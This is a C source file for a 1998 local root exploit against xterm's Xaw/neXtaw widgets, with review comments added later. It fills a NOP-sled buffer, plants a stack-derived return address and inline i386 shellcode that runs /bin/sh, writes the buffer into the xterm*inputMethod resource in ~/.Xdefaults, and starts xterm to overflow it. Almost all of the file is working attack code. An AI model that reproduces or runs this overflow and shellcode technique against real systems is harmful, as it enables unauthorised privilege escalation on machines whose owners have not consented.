/*
 
  xterm_exp.c : linux/x86 xterm.Xaw exploit
  by alcuin - 5/4/98 -
 
  It works against both Xaw and neXtaw widgets
 
  NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
  use xterm again.
	
*/

#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>


/*
 * Read the current stack pointer.
 *
 * The inline asm copies %esp into %eax and the function then falls off
 * its end without a `return`: the caller (main, `sp=getsp()`) receives
 * whatever the i386 calling convention happens to leave in %eax.  The asm
 * has no output operand, so the compiler is never told that %eax was
 * written; using the value of a non-void function that has no return
 * statement is undefined behaviour by the C standard, and the result is
 * not guaranteed to survive optimisation.  32-bit x86 only.
 */
unsigned int getsp()
{
  asm("mov %esp,%eax");
}

/*
 * Payload: hand-written i386 machine code, placed in a function only so
 * that it has an address.  It is never invoked as a C function -- main
 * reads its bytes with `strcpy(s,(char*)rootshell)` -- and the asm block
 * itself contains no `ret`.  It ends in a Linux `int $0x80` system-call
 * trap followed by the literal "/bin/sh" string emitted into the text
 * section.
 *
 * Pre-C99 GNU style: `inline` with an implicit `int` return type.
 * NOTE(review): under C99 inline semantics a plain `inline` definition
 * need not be emitted as an external symbol, so taking its address can
 * fail to link with a modern compiler -- TODO confirm with the toolchain.
 */
inline rootshell()
{
  __asm__(
    "movb $0x56, %al\n\t"
    "l1:cmpb $0x12, %al\n\t"
    "je l2\n\t"
    "movb $0x12,%al\n\t"
    "call l1\n\t"
    "l2:pop %esi\n\t"
    "xorl %eax,%eax\n\t"
    "movb $0x25, %al\n\t"
    "addl %eax,%esi\n\t"
    "movl %esi,%ebx\n\t"
    "movl %esi,%edi\n\t"
    "movb $8,%al\n\t"
    "addl %eax,%edi\n\t"
    "movb $5,%al\n\t"
    "addl %eax,%esi\n\t"
    "movl %esi,(%edi)\n\t"
    "movl %edi,%ecx\n\t"
    "incl %edi\n\t"
    "incl %edi\n\t"
    "incl %edi\n\t"
    "incl %edi\n\t"
    "xorb %al,%al\n\t"
    "movl %eax,(%edi)\n\t"
    "movl %edi,%edx\n\t"
    "movb $0xb,%al\n\t"
    "int $0x80\n\t"
    ".string \"/bin/sh\"\n"
  );
}


#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"

/*
 * Entry point.  Rewrites ~/.Xdefaults so that the `xterm*inputMethod`
 * resource carries a 16 KiB value built in shellbuf, keeps the previous
 * file as .Xdefaults.old (see the header comment), and then starts xterm,
 * which reads that file.
 *
 * Pre-C99 style throughout: implicit `int` return type, argc/argv unused,
 * and chdir(), strncmp(), memset(), strcpy() and execl() are called
 * without <unistd.h> / <string.h>, so they are implicitly declared
 * (removed from the language in C99).
 */
main (int argc, char **argv)
{

  char *home;
  FILE *f_in, *f_out;
  char buf[16384];
  char shellbuf[16384];
  char *s;
  int i;                      /* unused */
  unsigned int sp=getsp();    /* stack pointer of this frame, sampled first */

  /* Work in $HOME when it is set; chdir()'s result is not checked, so the
     relative paths below may still refer to the original cwd. */
  if (home = getenv("HOME")) chdir(home);

  if (!(f_out = fopen(NEWFILE, "w")))
    {
      perror("fopen");
      exit(1);
    }

  /* Copy the existing .Xdefaults (if any) into the new file, dropping
     the xterm*inputMethod line. */
  if (f_in = fopen(CONFFILE, "r"))
    {
      fseek(f_in,0,SEEK_SET);
      /* feof() only turns true after a read has already failed and
         fgets()'s return value is never checked: on a file ending in a
         newline the last line is processed twice (buf still holds it),
         and on an empty file buf is used uninitialised.  Lines longer
         than 16383 bytes are split across iterations. */
      while (!feof(f_in))
        {
          fgets(buf,16384,f_in);
          /* skip leading blanks; isblank() is C99/GNU, and a plain char
             with a negative value is not a valid ctype argument */
          for (s=buf;isblank(*s);s++);
          /* NOTE(review): `< 0` keeps only lines whose first 17 bytes sort
             *before* the prefix; any line sorting after it is dropped as
             well, not just the matching resource.  `!= 0` would match the
             apparent intent. */
          if (strncmp(s,"xterm*inputMethod",17)<0)
            fputs(buf,f_out);
        }
      fclose(f_in);
    }

  /* fill the buffer with nops */
  memset(shellbuf, 0x90, sizeof(shellbuf));
  shellbuf[sizeof(shellbuf)-1] = 0;   /* keep it a C string for fputs() */

  /* write the return address: a 4-byte store through an int pointer into
     a char array (technically a strict-aliasing violation), value derived
     from the stack pointer sampled above */
  s = shellbuf+2052;
  *(int *)s=sp+0x69F5;

  /* write the root shell code: the bytes at rootshell's address are read
     as if they were a C string */
  s = shellbuf+2800;
  strcpy(s,(char*)rootshell);

  fputs("xterm*inputMethod:",f_out);
  fputs(shellbuf, f_out);
  fclose(f_out);    /* return value unchecked; a failed flush goes unnoticed */

  /* Fixed command strings, no user-controlled input; both operate on the
     relative paths in the current directory. */
  system("/bin/cp "CONFFILE" "OLDFILE);
  system("/bin/mv -f "NEWFILE" "CONFFILE);

  execl("/usr/X11R6/bin/xterm","xterm",NULL);
  /* only reached if execl() fails; main then ends without a return value */
}
/*                    www.hack.co.za              [2000]*/